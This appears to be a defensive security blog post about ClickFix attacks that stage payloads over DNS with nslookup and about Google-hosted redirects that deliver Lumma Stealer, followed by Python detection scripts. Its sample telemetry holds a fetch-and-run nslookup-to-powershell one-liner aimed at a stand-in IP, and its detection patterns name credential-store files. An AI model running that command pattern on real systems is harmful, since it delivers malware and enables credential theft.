Old Trick, New Wrapper: How DNS and Trusted Platforms Are Powering Modern Malware Campaigns

Feb 22, 2026

If you’ve been in security for a while, you’ve probably had this reaction to the recent ClickFix reporting:

“Wait… nslookup over DNS? That’s not new.”

You’re absolutely right.

DNS-based payload delivery has been around for years. What’s changed is how attackers are packaging it, scaling it, and blending it into everyday workflows. When you combine that with abuse of trusted platforms like Google services, you get campaigns that don’t look suspicious until it’s too late.

Let’s unpack what’s happening and why it matters.

Part 1: Abusing Google Services to Deliver Lumma and a Trojanized Browser

One of the more interesting recent campaigns was documented by CTM360. The attackers leveraged legitimate Google infrastructure, including:

  • Google Groups threads
  • Google Docs and Drive links
  • Redirect chains hosted on Google domains

Instead of hosting malware on obviously malicious domains, the attackers planted links in discussion threads that appeared technical and legitimate. Victims would click a Google-hosted link, which then redirected them to a payload.

What Gets Delivered

Depending on the operating system:

  • Windows systems receive Lumma Stealer, a well-known infostealer that harvests credentials, steals cookies, and targets crypto wallets. In some cases the archives are padded to large sizes so they exceed the file-size limits that many automated scanners and sandboxes enforce, which then skip the file rather than analyze it.
  • Linux users are served a trojanized Chromium-based “Ninja Browser.” It looks like a privacy-focused browser but installs malicious extensions and establishes persistence for remote access.

Why This Works

The key isn’t technical novelty. It’s trust.

  • Security tools tend to trust Google domains.
  • Users tend to trust Google-hosted links.
  • The initial infrastructure doesn’t look malicious.

This is infrastructure laundering. The malware isn’t on Google’s servers, but the delivery path starts there.

Part 2: The ClickFix DNS Variant — Not New, Just Smartly Repackaged

ClickFix attacks rely on social engineering. A user sees a fake error page that tells them to copy and run a command to “fix” something. Historically, these launched PowerShell download cradles. The newer variation instructs users to run:

nslookup <malicious domain> <attacker-controlled DNS server>

The attacker-controlled DNS server answers with records whose data carries embedded script content. The pasted command then turns that output into an executed second stage, often a remote access trojan such as ModeloRAT. Because the resolver is named on the command line, the query never touches the organization's own DNS servers, so resolver-side logging sees nothing.

DNS-based staging is not new. We’ve seen for years:

  • DNS tunneling tools like DNScat2
  • Payload retrieval via TXT records
  • C2 over DNS
  • Data exfiltration over DNS

What’s new is the integration into a user-driven ClickFix flow. The attacker doesn’t exploit a vulnerability; they convince the user to execute a living-off-the-land binary. nslookup.exe ships with Windows and is signed by Microsoft, so application allow-lists and most endpoint controls let it run without a second look.

The Bigger Pattern: Living Inside Trust

1. Abuse of Legitimate Infrastructure

Google services. DNS. Native Windows tools. There’s no exploit chain to analyze. No zero-day. Just smart misuse of what already exists.

2. User-Initiated Execution

The victim clicks the link. The victim runs the command. The victim downloads the file. That dramatically reduces the need for complex intrusion methods.

3. Evasion Through Normalcy

Oversized archives, DNS responses, and redirect chains on trusted domains. These campaigns aren’t noisy. They’re blended.

What Defenders Should Focus On

1. DNS Visibility Is No Longer Optional

  • Log DNS queries and responses at both the resolver and the network edge. A lookup with an explicit server argument never reaches your resolver, so only network telemetry or process command-line logging records it.
  • Detect endpoints sending DNS to resolvers other than the corporate ones, and block outbound port 53 from workstations to anything else.
  • Identify unusually long or encoded DNS responses, for example TXT answers that look like base64 or have the high character entropy of an encoded blob.
  • Flag nslookup on workstations, especially with an explicit server argument or wrapped in a cmd/PowerShell one-liner. Baseline legitimate IT usage first so the rule stays actionable.
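The following is an added example, not code from the original post or from any vendor report it cites. It turns the two points above, the nslookup-with-explicit-resolver ClickFix variant from Part 2 and the DNS visibility checklist, into detection logic that runs over two constructed telemetry feeds: process-creation events as an EDR records them (host, image, command line) and DNS query/response events as a network sensor would record them. The field names, thresholds, corporate resolver list, regular expressions and every sample event are assumptions.

```python
"""Detecting the nslookup-based ClickFix staging pattern.

Added example; not code from the original post or from any vendor report.
Runs over two constructed feeds: process-creation events as an EDR records
them (host, image, command line) and DNS query/response events as a network
sensor would record them. Field names, thresholds, the corporate resolver
list and every sample event are assumptions.
"""
from __future__ import annotations

import base64
import math
import re
from collections import Counter

CORPORATE_RESOLVERS = {"10.0.0.53", "10.0.1.53"}   # assumed internal resolvers
LONG_ANSWER_CHARS = 120          # assumed; baseline your own TXT answer lengths
ENCODED_ENTROPY_BITS = 4.0       # bits/char: English ~4.1, base64 blobs ~5.5-6
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# Tokens that turn "look up a name" into "run whatever came back" (assumed list)
EXEC_TOKENS = re.compile(
    r"\b(powershell|pwsh|cmd(\.exe)?\s*/c|for\s+/f|iex|invoke-expression|"
    r"mshta|wscript|cscript)\b", re.I)
NSLOOKUP_ARGS = re.compile(r"""nslookup(?:\.exe)?\s+([^|&)'"]*)""", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def inspect_process(ev: dict) -> list[str]:
    """Flag nslookup runs that name a non-corporate resolver on the command
    line. That second positional argument bypasses the OS resolver, so the
    lookup never shows up in corporate DNS logs; the process telemetry is
    the only host-side record of it."""
    cmd = ev["cmdline"]
    if "nslookup" not in cmd.lower():
        return []
    findings: list[str] = []
    m = NSLOOKUP_ARGS.search(cmd)          # also finds nslookup nested in a for /f loop
    args = m.group(1).split() if m else []
    options = [a for a in args if a.startswith("-")]
    positional = [a for a in args if not a.startswith("-")]
    if len(positional) >= 2 and positional[1] not in CORPORATE_RESOLVERS:
        findings.append(f"explicit_external_resolver:{positional[1]}")
    if any(re.fullmatch(r"-(q|query|type)=txt", o, re.I) for o in options):
        findings.append("txt_lookup")
    if EXEC_TOKENS.search(cmd):
        findings.append("lookup_output_fed_to_interpreter")
    return findings


def inspect_dns(ev: dict) -> list[str]:
    """Flag DNS traffic that bypasses corporate resolvers or carries long or
    encoded answer data, the shape a staged payload takes."""
    findings: list[str] = []
    if ev["resolver"] not in CORPORATE_RESOLVERS:
        findings.append(f"query_to_external_resolver:{ev['resolver']}")
    data = "".join(ev.get("answers", []))   # TXT answers arrive as <=255-byte strings
    if len(data) >= LONG_ANSWER_CHARS:
        findings.append(f"long_answer:{len(data)}")
    if ev.get("qtype") == "TXT" and (
            BASE64ISH.match(data) or shannon_entropy(data) >= ENCODED_ENTROPY_BITS):
        findings.append("encoded_txt_answer")
    return findings


def triage(process_events: list[dict], dns_events: list[dict]) -> dict[str, list[str]]:
    """Group findings per host so the process and network signals land together."""
    per_host: dict[str, list[str]] = {}
    for ev in process_events:
        per_host.setdefault(ev["host"], []).extend(inspect_process(ev))
    for ev in dns_events:
        per_host.setdefault(ev["host"], []).extend(inspect_dns(ev))
    return {h: f for h, f in per_host.items() if f}


# Constructed sample telemetry. Hosts and names are fictitious; 203.0.113.0/24
# is a documentation range; OPAQUE_BLOB stands in for an encoded second stage.
OPAQUE_BLOB = base64.b64encode(bytes(range(256))).decode()
PROCESS_EVENTS = [
    {"host": "ws-17", "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup intranet.corp.example"},                      # benign
    {"host": "ws-03", "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -q=mx mail.corp.example 10.0.0.53"},           # IT admin
    {"host": "ws-42", "image": r"C:\Windows\System32\cmd.exe",           # ClickFix-shaped
     "cmdline": "cmd.exe /c for /f \"delims=\" %i in ('nslookup fix.example 203.0.113.5') do powershell -c %i"},
]
DNS_EVENTS = [
    {"host": "ws-17", "resolver": "10.0.0.53", "qname": "intranet.corp.example",
     "qtype": "A", "answers": ["10.0.5.20"]},
    {"host": "ws-42", "resolver": "203.0.113.5", "qname": "fix.example",
     "qtype": "TXT", "answers": [OPAQUE_BLOB[:255], OPAQUE_BLOB[255:]]},
]

if __name__ == "__main__":
    for host, findings in triage(PROCESS_EVENTS, DNS_EVENTS).items():
        print(host, *findings, sep="\n  ")
```

The two benign invocations produce nothing: one has no server argument at all, the other names a corporate resolver. Only ws-42 fires, and it fires on both feeds, which is the point of grouping per host: an explicit external resolver on the command line plus a long, base64-looking TXT answer to that same resolver is a much stronger signal than either alone. Tune LONG_ANSWER_CHARS against your own traffic; SPF and DKIM records are legitimate long TXT answers and will show up until you baseline them.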

2. Watch for Behavioral Chains

Look for sequences: Archive download → process execution from the extracted location → access to browser credential stores (Chromium’s Login Data and Cookies files, Firefox’s logins.json and key4.db) by a process that is not the browser itself. Each step is unremarkable on its own; chaining legitimate behaviors is the hallmark of modern campaigns.

3. Stop Blindly Trusting Trusted Domains

Reputation alone isn’t enough. Inspect redirect chains and evaluate the final delivery, even if the origin is a trusted cloud provider.

4. Hunt for Infostealer Behavior

If you detect a non-browser process reading the browser’s SQLite credential databases, or suspicious outbound HTTPS sessions from a freshly launched binary shortly after execution, assume compromise and contain immediately. Waiting for the exfiltration to confirm the theft only gives the stealer time to finish.
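As an added example covering both the behavioral-chain point (section 2) and the infostealer-hunting point (section 4), the following correlator is not code from the original post. It walks a constructed, time-ordered list of host events in an assumed EDR-like schema and reports when the stages archive download, execution from a user-writable directory, credential-store read by a non-browser process, and outbound HTTPS from that process occur in order within a window. The credential-store file names are the real Chromium and Firefox profile files; the field names, the 15-minute window, the user-writable-directory heuristic and every sample event are assumptions.

```python
"""Correlating the chain archive download -> execution from the extracted
location -> browser credential-store read -> outbound HTTPS.

Added example; not code from the original post. It consumes a constructed,
time-ordered list of host events in an assumed EDR-like schema. The
credential-store file names are the real Chromium and Firefox profile
files; the field names, the 15-minute window, the user-writable-directory
heuristic and every sample event are assumptions.
"""
from __future__ import annotations

from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)            # assumed: a chain must complete inside this
ARCHIVE_EXT = (".zip", ".rar", ".7z", ".iso")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
CRED_STORES = {"login data", "cookies", "web data",        # Chromium family
               "logins.json", "key4.db", "cookies.sqlite"}  # Firefox
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\")
STAGES = ("archive_download", "exec_from_user_dir", "cred_store_read", "outbound_https")


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> str | None:
    """Map one raw event onto a chain stage, or None if it is not interesting.
    A browser reading its own credential store is normal; any other process
    doing so is the infostealer signal."""
    kind, proc = ev["type"], base(ev["process"])
    if kind == "file_write" and proc in BROWSERS and ev["path"].lower().endswith(ARCHIVE_EXT):
        return "archive_download"
    if kind == "process_start" and any(d in ev["process"].lower() for d in USER_WRITABLE):
        return "exec_from_user_dir"
    if kind == "file_read" and proc not in BROWSERS and base(ev["path"]) in CRED_STORES:
        return "cred_store_read"
    if kind == "net_connect" and proc not in BROWSERS and ev.get("dport") == 443:
        return "outbound_https"
    return None


def correlate(events: list[dict]) -> list[dict]:
    """Walk events per host in time order and report chains whose stages
    occur in sequence within WINDOW. Reaching cred_store_read already
    warrants containment; outbound_https after it marks likely exfiltration."""
    alerts: list[dict] = []
    state: dict[str, dict] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage is None:
            continue
        s = state.setdefault(ev["host"], {"idx": 0, "start": None, "chain": []})
        if s["start"] is not None and ev["ts"] - s["start"] > WINDOW:
            s.update(idx=0, start=None, chain=[])      # stale partial chain
        if stage == STAGES[s["idx"]]:                  # the next expected stage
            if s["idx"] == 0:
                s["start"] = ev["ts"]
            s["chain"].append((stage, base(ev["process"])))
            s["idx"] += 1
            if s["idx"] == 3:
                alerts.append({"host": ev["host"], "severity": "contain",
                               "chain": list(s["chain"])})
            elif s["idx"] == 4:
                alerts.append({"host": ev["host"], "severity": "contain_exfil_suspected",
                               "chain": list(s["chain"])})
                s.update(idx=0, start=None, chain=[])
        elif stage == STAGES[0]:                       # a new download restarts the chain
            s.update(idx=1, start=ev["ts"], chain=[(stage, base(ev["process"]))])
    return alerts


# Constructed sample telemetry: ws-07 is a user unpacking a work archive,
# ws-19 runs a setup binary that then raids the Edge credential store.
T0 = datetime(2026, 2, 20, 9, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0, "host": "ws-07", "type": "file_write", "process": "chrome.exe",
     "path": r"C:\Users\a\Downloads\quarterly.zip"},
    {"ts": T0 + timedelta(minutes=1), "host": "ws-07", "type": "process_start",
     "process": r"C:\Program Files\7-Zip\7zFM.exe"},
    {"ts": T0 + timedelta(minutes=2), "host": "ws-07", "type": "file_read", "process": "chrome.exe",
     "path": r"C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ts": T0 + timedelta(minutes=5), "host": "ws-19", "type": "file_write", "process": "msedge.exe",
     "path": r"C:\Users\b\Downloads\Setup_v2.zip"},
    {"ts": T0 + timedelta(minutes=6), "host": "ws-19", "type": "process_start",
     "process": r"C:\Users\b\AppData\Local\Temp\Setup_v2\Setup.exe"},
    {"ts": T0 + timedelta(minutes=7), "host": "ws-19", "type": "file_read", "process": "Setup.exe",
     "path": r"C:\Users\b\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"ts": T0 + timedelta(minutes=8), "host": "ws-19", "type": "net_connect", "process": "Setup.exe",
     "dport": 443, "dst": "203.0.113.77"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["host"], alert["severity"], " -> ".join(s for s, _ in alert["chain"]))
```

The benign host never alerts: its archive is opened by an installed archiver rather than a binary dropped in Temp, and the only process touching Login Data is Chrome itself. The compromised host produces a "contain" alert the moment a non-browser process reads the store, before any network activity, and a second alert when that same process opens an HTTPS session. In production you would key the chain on the process's parent lineage rather than on the directory heuristic used here, but the ordering and windowing logic carry over unchanged.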

5. Train Users Beyond Phishing Awareness

Users should know that no legitimate website requires them to copy a command and run it, whether in a terminal, in PowerShell, or in the Windows Run dialog, to fix an error. Attackers are leaning into technical legitimacy; your training must adapt.

Final Takeaway

The nslookup technique, DNS staging, and trusted infrastructure abuse are not new. What is new is the seamless integration into scalable, low-friction attack chains.

There are no zero-days here. Just trust abuse, user manipulation, and lightweight staging over channels that most organizations barely inspect.